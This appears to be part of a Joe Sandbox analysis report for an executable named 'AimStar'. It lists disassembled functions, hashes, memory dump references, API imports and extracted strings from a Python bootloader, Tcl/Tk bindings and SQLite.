Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: 72e60c5750dc642b1ba22b15bc68d6b8610a89e6cc0c9bc41c7db94711dd431d
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: 90514026A0CA4286E710FF21D5875A9B768FB487A4FC48136EA4D537A6DF3CF448C760

Function 00007FF8A876C380 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 377COMMON

Download Yara Rule

Strings

recovered %d frames from WAL file %s, xrefs: 00007FF8A876C8D8
, xrefs: 00007FF8A876C40F

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: $recovered %d frames from WAL file %s
API String ID: 0-3175670447
Opcode ID: d297ce05d362dc23ee67dd2e9d60e0eea844db88850b10c762bc8624b7c4ec51
Instruction ID: 3732a3a023dbaf475a1914cab33dad312c5252841314231aa8dd4207a85c38a6
Opcode Fuzzy Hash: d297ce05d362dc23ee67dd2e9d60e0eea844db88850b10c762bc8624b7c4ec51
Instruction Fuzzy Hash: ECF1BB32A097869AE764DF25E08076E77A0FB84BD8F014035DA9D87B98DF3CE844CB54

Function 00007FF8A87C632A Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
Instruction ID: e078a8d4c24fb004a41411f7e8ca2a7b565cf4dfdb54653bf675078c03ad829f
Opcode Fuzzy Hash: fd9289cba8bfa2c1e04b0f14acf51c89b125ee162225301f3ae995f4e4b14918
Instruction Fuzzy Hash: B8B0923F20D24884C301ABF14681A0C2E20E380E10F040051C3D102260E3AE441B8311

Function 00007FF710F45820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45830
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45842
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45879
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4588B
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458A4
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458B6
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458CF
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458E1
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F458FD
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4590F
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4592B
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4593D
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45959
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F4596B
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45987
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F45999
GetProcAddress.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459B5
GetLastError.KERNEL32(?,00007FF710F464BF,?,00007FF710F4336E), ref: 00007FF710F459C7

Strings

PyUnicode_FromFormat, xrefs: 00007FF710F45F3D, 00007FF710F45F5F
Py_ExitStatusException, xrefs: 00007FF710F4589A, 00007FF710F458BC
PyObject_GetAttrString, xrefs: 00007FF710F45D43, 00007FF710F45D65
Py_DecRef, xrefs: 00007FF710F45826, 00007FF710F45848
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF710F45DCD, 00007FF710F45DEF
PyUnicode_FromString, xrefs: 00007FF710F45F6B, 00007FF710F45F8D
PyRun_SimpleStringFlags, xrefs: 00007FF710F45DFB, 00007FF710F45E1D
PyImport_AddModule, xrefs: 00007FF710F45BD3, 00007FF710F45BF5
PyMarshal_ReadObjectFromString, xrefs: 00007FF710F45C5D, 00007FF710F45C7F
Py_DecodeLocale, xrefs: 00007FF710F4586F, 00007FF710F45891
PyConfig_SetString, xrefs: 00007FF710F45A35, 00007FF710F45A57
PyErr_Fetch, xrefs: 00007FF710F45ABF, 00007FF710F45AE1
PyObject_CallFunctionObjArgs, xrefs: 00007FF710F45D15, 00007FF710F45D37
PyErr_Clear, xrefs: 00007FF710F45A91, 00007FF710F45AB3
PyMem_RawFree, xrefs: 00007FF710F45C8B, 00007FF710F45CAD
PyErr_Occurred, xrefs: 00007FF710F45B1B, 00007FF710F45B3D
PyImport_ExecCodeModule, xrefs: 00007FF710F45C01, 00007FF710F45C23
PyImport_ImportModule, xrefs: 00007FF710F45C2F, 00007FF710F45C51
PyUnicode_Replace, xrefs: 00007FF710F45FC7, 00007FF710F45FE9
PyErr_Print, xrefs: 00007FF710F45B49, 00007FF710F45B6B
PyErr_NormalizeException, xrefs: 00007FF710F45AED, 00007FF710F45B0F
PyObject_Str, xrefs: 00007FF710F45D9F, 00007FF710F45DC1
PySys_SetObject, xrefs: 00007FF710F45E85, 00007FF710F45EA7
PyUnicode_AsUTF8, xrefs: 00007FF710F45EB3, 00007FF710F45ED5
Py_InitializeFromConfig, xrefs: 00007FF710F458F3, 00007FF710F45915
PyConfig_InitIsolatedConfig, xrefs: 00007FF710F459AB, 00007FF710F459CD
PyConfig_Clear, xrefs: 00007FF710F4597D, 00007FF710F4599F
PyStatus_Exception, xrefs: 00007FF710F45E29, 00007FF710F45E4B
PyModule_GetDict, xrefs: 00007FF710F45CB9, 00007FF710F45CDB
PyUnicode_Join, xrefs: 00007FF710F45F99, 00007FF710F45FBB
PyConfig_Read, xrefs: 00007FF710F459D9, 00007FF710F459FB
PyErr_Restore, xrefs: 00007FF710F45B77, 00007FF710F45B99
PyUnicode_Decode, xrefs: 00007FF710F45EE1, 00007FF710F45F03
Py_PreInitialize, xrefs: 00007FF710F4594F, 00007FF710F45971
PyUnicode_DecodeFSDefault, xrefs: 00007FF710F45F0F, 00007FF710F45F31
Failed to get address for %hs, xrefs: 00007FF710F45851
GetProcAddress, xrefs: 00007FF710F45858
PyObject_CallFunction, xrefs: 00007FF710F45CE7, 00007FF710F45D09
Py_IsInitialized, xrefs: 00007FF710F45921, 00007FF710F45943
PyConfig_SetWideStringList, xrefs: 00007FF710F45A63, 00007FF710F45A85
PyConfig_SetBytesString, xrefs: 00007FF710F45A07, 00007FF710F45A29
PySys_GetObject, xrefs: 00007FF710F45E57, 00007FF710F45E79
PyObject_SetAttrString, xrefs: 00007FF710F45D71, 00007FF710F45D93
PyEval_EvalCode, xrefs: 00007FF710F45BA5, 00007FF710F45BC7
Py_Finalize, xrefs: 00007FF710F458C5, 00007FF710F458E7

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 2f14c39f281cfab80866f9a7ba3ef68efb82656077ee610267cefe6c84663f76
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 85229138E0DF4BA1FA14BB55A8166B5A7ACAF05B71BC45136C85E42761FF3CB18CC260

Function 00007FF710F476B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF710F476C7
GetLastError.KERNEL32 ref: 00007FF710F476D9
GetProcAddress.KERNEL32 ref: 00007FF710F47715
GetLastError.KERNEL32 ref: 00007FF710F47727
GetProcAddress.KERNEL32 ref: 00007FF710F47740
GetLastError.KERNEL32 ref: 00007FF710F47752
GetProcAddress.KERNEL32 ref: 00007FF710F4776B
GetLastError.KERNEL32 ref: 00007FF710F4777D
GetProcAddress.KERNEL32 ref: 00007FF710F47799
GetLastError.KERNEL32 ref: 00007FF710F477AB
GetProcAddress.KERNEL32 ref: 00007FF710F477C7
GetLastError.KERNEL32 ref: 00007FF710F477D9
GetProcAddress.KERNEL32 ref: 00007FF710F477F5
GetLastError.KERNEL32 ref: 00007FF710F47807
GetProcAddress.KERNEL32 ref: 00007FF710F47823
GetLastError.KERNEL32 ref: 00007FF710F47835
GetProcAddress.KERNEL32 ref: 00007FF710F47851
GetLastError.KERNEL32 ref: 00007FF710F47863

Strings

Tcl_FinalizeThread, xrefs: 00007FF710F477BD, 00007FF710F477DF
Tcl_GetVar2, xrefs: 00007FF710F47A13, 00007FF710F47A35
Tcl_MutexLock, xrefs: 00007FF710F478A3, 00007FF710F478C5
Tcl_ConditionNotify, xrefs: 00007FF710F4795B, 00007FF710F4797D
Tk_Init, xrefs: 00007FF710F47C69, 00007FF710F47C8B
Tcl_NewByteArrayObj, xrefs: 00007FF710F47AF9, 00007FF710F47B1B
Tcl_GetCurrentThread, xrefs: 00007FF710F47847, 00007FF710F47869
Tcl_MutexUnlock, xrefs: 00007FF710F478D1, 00007FF710F478F3
Tcl_DeleteInterp, xrefs: 00007FF710F477EB, 00007FF710F4780D
Tcl_GetString, xrefs: 00007FF710F47A9D, 00007FF710F47ABF
Tcl_Finalize, xrefs: 00007FF710F4778F, 00007FF710F477B1
Tcl_Free, xrefs: 00007FF710F47C3B, 00007FF710F47C5D
Tcl_FindExecutable, xrefs: 00007FF710F47736, 00007FF710F47758
Tcl_ConditionFinalize, xrefs: 00007FF710F4792D, 00007FF710F4794F
Tcl_CreateThread, xrefs: 00007FF710F47819, 00007FF710F4783B
Tcl_MutexFinalize, xrefs: 00007FF710F478FF, 00007FF710F47921
Tcl_ThreadQueueEvent, xrefs: 00007FF710F479B7, 00007FF710F479D9
Tcl_ThreadAlert, xrefs: 00007FF710F479E5, 00007FF710F47A07
Tk_GetNumMainWindows, xrefs: 00007FF710F47C97, 00007FF710F47CB9
Tcl_EvalObjv, xrefs: 00007FF710F47BDF, 00007FF710F47C01
Failed to get address for %hs, xrefs: 00007FF710F476E8
Tcl_EvalEx, xrefs: 00007FF710F47BB1, 00007FF710F47BD3
GetProcAddress, xrefs: 00007FF710F476EF
Tcl_SetVar2, xrefs: 00007FF710F47A41, 00007FF710F47A63
Tcl_NewStringObj, xrefs: 00007FF710F47ACB, 00007FF710F47AED
Tcl_Alloc, xrefs: 00007FF710F47C0D, 00007FF710F47C2F
Tcl_CreateInterp, xrefs: 00007FF710F4770B, 00007FF710F4772D
Tcl_SetVar2Ex, xrefs: 00007FF710F47B27, 00007FF710F47B49
Tcl_ConditionWait, xrefs: 00007FF710F47989, 00007FF710F479AB
Tcl_CreateObjCommand, xrefs: 00007FF710F47A6F, 00007FF710F47A91
Tcl_GetObjResult, xrefs: 00007FF710F47B55, 00007FF710F47B77
Tcl_DoOneEvent, xrefs: 00007FF710F47761, 00007FF710F47783
Tcl_Init, xrefs: 00007FF710F476C0, 00007FF710F476DF
Tcl_EvalFile, xrefs: 00007FF710F47B83, 00007FF710F47BA5
Tcl_JoinThread, xrefs: 00007FF710F47875, 00007FF710F47897

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 2fc94ddd97f4e76d324f9d26f35836474d51017f45c972260123f0ae09ccbc4f
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 91029228E0DF0B91EA15BB56A8179B5A7ADBF04775BC51132D81E423A4EF3CB58CC230

Function 00007FF710F481C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF710F488A7,?,?,00000000,00007FF710F43CBB), ref: 00007FF710F4821C

Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA

Strings

LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF710F482C9
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF710F481F3
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF710F4828D
\, xrefs: 00007FF710F48251
%.*s, xrefs: 00007FF710F482FC
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF710F48230
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF710F48363
CreateDirectory, xrefs: 00007FF710F4836C

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: b6d26ab03f23901deee33b40795c6571ce7bd6a2c21ff3994ccabad1336434ce
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: 74515235A1CE4251EB50BB25E853ABEA298AF947A0FC44431DE0EC27D5EE2CF54DC360

Function 00007FF710F41600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

fopen, xrefs: 00007FF710F41663
Failed to extract %s: failed to open archive file!, xrefs: 00007FF710F416A2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF710F416DA
fread, xrefs: 00007FF710F417E6
Failed to create symbolic link %s!, xrefs: 00007FF710F41622
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF710F417DF
malloc, xrefs: 00007FF710F41749
fseek, xrefs: 00007FF710F416E1
Failed to extract %s: failed to open target file!, xrefs: 00007FF710F4165C
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF710F417CA
fwrite, xrefs: 00007FF710F417D1
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF710F41742

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
Instruction ID: 7816bcef1fa70d460e86ca810e2f4f89878ad3b0ef38055e2c30d485185660e1
Opcode Fuzzy Hash: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
Instruction Fuzzy Hash: B1515C75B0CE4692EA10BB21A4029A9A3A8BF447B4FC44531EE0C87796DE3CF589C760

Function 00007FF8A87CD690 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

_init, xrefs: 00007FF8A87CD98E
no entry point [%s] in shared library [%s], xrefs: 00007FF8A87CDB2C
lib, xrefs: 00007FF8A87CD8E1
sqlite3_extension_init, xrefs: 00007FF8A87CD71A
error during initialization: %s, xrefs: 00007FF8A87CDA56
%s.%s, xrefs: 00007FF8A87CD75C
unable to open shared library [%.*s], xrefs: 00007FF8A87CDC9F
sqlite3_, xrefs: 00007FF8A87CD893
not authorized, xrefs: 00007FF8A87CD703

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
Instruction ID: 4156505fd83588aa852e96104003bf0a70be2083c53d5b4a2ffbc592575a2686
Opcode Fuzzy Hash: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
Instruction Fuzzy Hash: FC02A3A1B4BA86A9EB59DB21A4543797BA1FF85BC1F084135CE4E07790DF3CE414C328

Function 00007FF8A878B150 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 330COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A878B253
00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF8A878B334

Strings

?, xrefs: 00007FF8A878B348
%lld, xrefs: 00007FF8A878B3F1
'%.*q', xrefs: 00007FF8A878B4A5
%!.15g, xrefs: 00007FF8A878B40E
%02x, xrefs: 00007FF8A878B554
-- , xrefs: 00007FF8A878B1E3, 00007FF8A878B202
zeroblob(%d), xrefs: 00007FF8A878B4F0
NULL, xrefs: 00007FF8A878B3BD

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
API String ID: 2830847230-875588658
Opcode ID: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
Instruction ID: 5bd91a1c2220e759783ccbd61d3bd1bc3eabbe0b4bccf0c2643d33adae490b35
Opcode Fuzzy Hash: 18b3c992eb28e1a0aff938a211f6eba9336fe8c1eb93773f796c937e9d9e6dad
Instruction Fuzzy Hash: 68E1A122F4A646AAFB22CF64D4543BD27A0EB057C8F444136DE0E66A95DF3CE485C368

Function 00007FF8A87A77F0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87A7B62

Strings

Cannot add a UNIQUE column, xrefs: 00007FF8A87A792C
UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FF8A87A7BA4
cannot add a STORED column, xrefs: 00007FF8A87A7B02
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FF8A87A799F
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FF8A87A797D
Cannot add a PRIMARY KEY column, xrefs: 00007FF8A87A7911
Cannot add a column with non-constant default, xrefs: 00007FF8A87A79F9
SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FF8A87A7987, 00007FF8A87A7A03, 00007FF8A87A7B11
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FF8A87A7CEC

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
